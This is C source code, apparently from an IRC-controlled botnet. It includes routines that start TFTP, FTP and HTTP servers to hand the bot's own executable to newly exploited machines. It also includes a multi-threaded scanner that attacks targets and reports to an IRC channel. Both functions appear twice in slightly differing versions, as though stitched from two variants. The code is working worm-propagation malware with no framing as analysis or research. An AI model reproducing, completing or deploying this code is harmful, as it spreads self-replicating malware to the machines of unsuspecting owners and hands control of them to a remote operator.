void CheckServers(ADVSCAN scan)
{
char sendbuf[IRCLINE];
DWORD id;
if(scan.exploit != -1) {
if (exploit[scan.exploit].tftp) {
#ifndef NO_TFTPD
if (findthreadid(TFTP_THREAD) == 0) {
static TFTP tftp;
tftp.port = tftpport;
tftp.threads = 0;
GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));
strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
tftp.sock=scan.sock;
tftp.notice = scan.notice;
if (scan.msgchan[0] == '\0') {
strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
tftp.silent = TRUE;
} else {
strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
tftp.silent = FALSE;
}
sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
while (tftp.gotinfo == FALSE)
Sleep(50);
} else
sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError());
addlog(sendbuf);
#endif
#ifndef NO_FTPD
//
static FTP ftp;
//ftp.port = FTP_PORT;
ftp.threads = 0;
GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
ftp.sock=scan.sock;
ftp.notice = scan.notice;
if (scan.msgchan[0] == '\0') {
strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
ftp.silent = TRUE;
} else {
strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
ftp.silent = FALSE;
}
sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
while (ftp.gotinfo == FALSE)
Sleep(50);
} else
sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError());
addlog(sendbuf);
//
#endif
}
} else if (exploit[scan.exploit].http) {
if (findthreadid(HTTP_THREAD) == 0) {
static HTTPD httpd;
char *c;
GetModuleFileName(0,httpd.dir,sizeof(httpd.dir));
if ((c=strrchr(httpd.dir,'\\')) != NULL)
*c='\0';
httpd.port = httpport;
httpd.enabled = FALSE;
sprintf(httpd.chan, scan.chan);
httpd.sock = scan.sock;
httpd.notice = scan.notice;
httpd.silent = scan.silent;
sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir);
httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL);
if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) {
while(httpd.info == FALSE)
Sleep(50);
} else
sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError());
addlog(sendbuf);
}
}
}
return;
}
void CheckServers(ADVSCAN scan)
{
char sendbuf[IRCLINE];
DWORD id;
if(scan.exploit != -1) {
if (exploit[scan.exploit].tftp) {
#ifndef NO_TFTPD
if (findthreadid(TFTP_THREAD) == 0) {
static TFTP tftp;
tftp.port = tftpport;
tftp.threads = 0;
GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));
strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
tftp.sock=scan.sock;
tftp.notice = scan.notice;
if (scan.msgchan[0] == '\0') {
strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
tftp.silent = TRUE;
} else {
strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
tftp.silent = FALSE;
}
sprintf(sendbuf, " t ftp -- Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
while (tftp.gotinfo == FALSE)
Sleep(50);
} else
sprintf(sendbuf, " t ftp -- Failed to start server, error: <%d>.", GetLastError());
addlog(sendbuf);
#endif
#ifndef NO_FTPD
//
static FTP ftp;
//ftp.port = FTP_PORT;
ftp.threads = 0;
GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
ftp.sock=scan.sock;
ftp.notice = scan.notice;
if (scan.msgchan[0] == '\0') {
strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
ftp.silent = TRUE;
} else {
strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
ftp.silent = FALSE;
}
sprintf(sendbuf, " f tp -- Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
while (ftp.gotinfo == FALSE)
Sleep(50);
} else
sprintf(sendbuf, " f tp -- Failed to start server, error: <%d>.", GetLastError());
addlog(sendbuf);
//
#endif
}
}
}
return;
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
sprintf(buffer,"Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE], szSelfExe[MAX_PATH];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
// FIX ME: Make this a standalone function
if (!FileExists(szLocalPayloadFile)) {
GetModuleFileName(0,szSelfExe,MAX_PATH);
CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
// FIX ME: Make this copy to the same directory (could affect other stuff)
}
*/
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
// failed to initialize CriticalSection
sprintf(buffer,"[scan]: Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
threads[scan.cthreadnum].port = scan.port;
threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0);
Sleep(50);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
